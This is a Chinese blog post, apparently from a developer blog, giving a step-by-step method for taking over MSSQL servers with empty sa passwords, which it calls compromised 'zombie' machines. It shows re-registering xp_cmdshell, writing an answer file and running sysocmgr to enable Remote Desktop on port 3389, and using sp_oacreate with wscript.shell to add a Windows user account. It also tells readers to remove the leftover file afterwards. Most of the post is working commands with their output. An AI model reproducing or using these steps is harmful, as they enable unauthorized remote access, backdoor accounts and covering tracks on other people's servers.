`
huanghuaibin
  • 浏览: 68307 次
  • 性别: Icon_minigender_1
  • 来自: 厦门
社区版块
存档分类
最新评论

直接用SQL连接器开启3389

阅读更多

一、用SQL连接器恢复XP_CMDSHLLE的命令

(1)SQL Query Analyzer
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'

(2)首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入

sp_addextendedproc 'xp_cmdshell','xpsql70.dll'

去除

sp_dropextendedproc 'xp_cmdshell'

(3)MSSQL2000

sp_addextendedproc 'xp_cmdshell','xplog70.dll'

修改sa密码 sp_password @old = null, @new = 'complexpwd', @loginame ='sa'
这个很简单,自己堵后门用:)

二、在可以运行XP_CMDSHELL的机器上直接开3389不需要上传的

实例过程:
连接到主机:202.xxx.xxx.xxx //大家可以用sql连接器连上有空口令的sql肉机
命令:xp_cmdshell "type c:\boot.ini" // 输入命令,看系统,server版的才能 开3389
执行成功,结果:
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect

命令:xp_cmdshell "echo [Components] > c:\duguxike" //在c盘根目录建写入一个文件,文件名duguxike大家可以自己改为自己的
执行成功,结果:

命令:xp_cmdshell "echo TsEnable = on >> c:\duguxike" //追加写入
执行成功,结果:

命令:xp_cmdshell "type c:\duguxike" //看看duguxike里的内容是否正确
执行成功,结果:
[Components]
TsEnable = on
TsEnable = on

命令:xp_cmdshell "sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\duguxike /q" //开3389,成功的话过会肉机会重启!!
执行成功,结果:
GetLocalManagedApplications returned (2)

之后就看大家的了,不过要记得册除新建的duguxike文件哦!!

三、不需要XP_CMDSHLL直接添加系统帐号,对XPLOG70.DLL被删很有效

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user gchn aaa /add'--
_content>如果XPCMDSHLL被删了第一条恢复
第二条可以执行XPCMDSHELL但是无法利用差异备分来上传的情况下使用(本人WIN2000下测试成功)
第三条XPLOG70.DLL被删除的情况下直接添加帐号前提对方了开了3389 139 23
才好用

分享到:
评论

相关推荐

    SQLDBX 连接多种类型的数据库

    下面我们将深入探讨SQLDBX的功能特性、安装与配置,以及如何使用它来连接和管理不同类型的数据库。 1. **功能特性**: - **多数据库支持**:SQLDBX支持多种数据库平台,如Microsoft SQL Server(包括Express、...

    ifix数据与sql数据库连接

    - 打开 SQL Server 配置管理器。 - 在“SQL Server 服务”窗口中找到“SQL Server (MSSQLSERVER)”服务。 - 将“启动类型”设为“自动”并点击“确定”。 - 再次右键点击“SQL Server (MSSQLSERVER)”服务,选择...

    C# SQL Server数据库连接

    本教程将通过一个简单示例,讲解如何使用C#连接到SQL Server数据库,执行查询并显示结果。 首先,你需要在C#项目中引入System.Data.SqlClient命名空间,这是用于与SQL Server交互的关键库。在代码文件顶部添加以下...

    网络注入教材

    5. **SQL恢复XP_CMDSHLL 直接用SQL连接器开启3389 .txt**:这部分可能涉及如何通过SQL命令执行系统级别的操作,例如开启远程桌面服务(3389端口),显示了SQL注入的危害性。 6. **教你如何清除SQL日志 .txt**:日志...

    VS2010连接SQL Server 2008操作与编程

    例如,使用C#,你可以创建一个SqlConnection对象,打开连接,创建SqlCommand对象并设置SQL语句,最后执行命令获取结果。 此外,VS2010还支持LINQ to SQL和Entity Framework,它们是ORM(对象关系映射)技术,能简化...

    ORACLE_SQLDeveloper使用教程

    - 可以直接在编辑器中编写 SQL 语句,然后执行。 5. **使用 SQL 参考手册:** - Oracle 提供了详尽的 SQL 参考手册,包含了所有的 SQL 语句和函数的文档。 - SQL Developer 通常会链接到这些手册,方便用户查阅...

    sql2005数据库打开sql2008数据库表的方法

    - 打开SQL Server Management Studio (SSMS)中的“对象资源管理器”,连接到SQL Server 2008实例。 - 右键点击想要转移到SQL Server 2005的数据库。 - 在任务菜单中选择“生成脚本”。 - 在“脚本向导”中的“选择...

    SQL 2005-2008查询分析器

    SQL Server 2005的查询分析器是开发人员和DBA的主要工作平台,它允许用户连接到SQL Server实例,执行Transact-SQL(T-SQL)脚本,查看查询结果,并进行性能优化。以下是一些关键特性: 1. 改进的用户界面:提供了一...

    pb 12+sqlanywhere程序打包直接运行

    标题 "pb 12+sqlanywhere程序打包直接运行" 描述的是如何使用PowerBuilder (PB) 12创建一个可执行文件,该文件能够在没有PB开发环境和SQL Anywhere 11.0数据库环境的计算机上运行。下面将详细解释这个过程。 首先,...

    JDBC连接SQL2005解决办法

    - 在“服务和连接的外围应用配置器”中,分别对“SQLEXPRESS”和“SQL Server Browser”的服务进行如下设置: - 对于“SQLEXPRESS”,选择“远程连接”,允许同时使用TCP/IP和Named Pipes。 - 对于“SQL Server ...

    SQLserver 数据库的连接工具

    标题中的“SQLserver 数据库的连接工具”指的是用于与Microsoft SQL Server进行交互的软件或应用程序,这类工具允许用户在不直接打开数据库管理界面的情况下查看、管理和操作数据库中的数据。SQL Server 2005是微软...

    SQL2000企业管理器绿色版

    这个"SQL2000企业管理器绿色版"是精简版或者便携式版本,无需安装即可使用,方便在不同环境或非固定工作台上快速启动数据库管理工作。 1. SQL Server 2000简介:SQL Server 2000是微软发布的一款关系型数据库管理...

    myeclipse连接SqlServer2005

    7. 使用MyEclipse的数据库工具,如SQL编辑器,可以编写和执行SQL查询,管理数据库对象,进行数据操作。 通过以上步骤,你就可以在MyEclipse中成功连接并操作SQL Server 2005数据库了。记得在使用过程中保持JDBC驱动...

    嵌入式SQL生成器

    4. **数据库连接管理**:嵌入式SQL需要在主程序中管理数据库连接,包括打开、关闭、事务管理等。 5. **SQL语句的优化**:生成器可能会提供一些优化选项,例如自动添加索引提示、避免全表扫描等,以提高查询效率。 ...

    sqlserver查询分析器 win10可用

    总结来说,SQL Server查询分析器在Win10上的使用涉及连接数据库、编写和执行SQL语句、管理和优化数据库等多个方面。无论你是数据库管理员还是开发人员,熟练掌握这些知识点都能提升你的工作效率并确保数据的安全性。

    javascript连接SQL数据库

    使用`Open`方法打开数据库连接,传入之前定义的连接字符串。 #### 四、执行SQL查询 ```javascript var objrs = objdbConn.Execute("SELECT menu_name FROM basic_mainmenu"); ``` - `Execute`方法用于执行SQL语句...

    Visual Sudio2019利用ODBC连接SQL server数据库

    在“配置属性”下,找到“连接器”> “数据源”> “ODBC数据源”。 3. **配置数据源**:在这里,你需要指定ODBC数据源名称(DSN),选择相应的ODBC驱动程序(如SQL Server Native Client 11.0或ODBC驱动程序17 for ...

    Java 实现连接sql server 2000教程

    9. **JNDI(Java Naming and Directory Interface)**: 在企业级应用中,通常使用JNDI查找数据库连接,而不是直接在代码中硬编码连接信息。这使得配置更改更加灵活。 10. **事务管理(Transaction Management)**: ...

    SQL2008数据库连接的设置

    为了允许外部连接,需要在服务器的防火墙中打开SQL Server使用的端口(通常是1433)。不正确的防火墙配置可能导致连接失败。 八、SQL Server Management Studio (SSMS) SSMS是SQL Server的主要管理工具,通过它可以...

Global site tag (gtag.js) - Google Analytics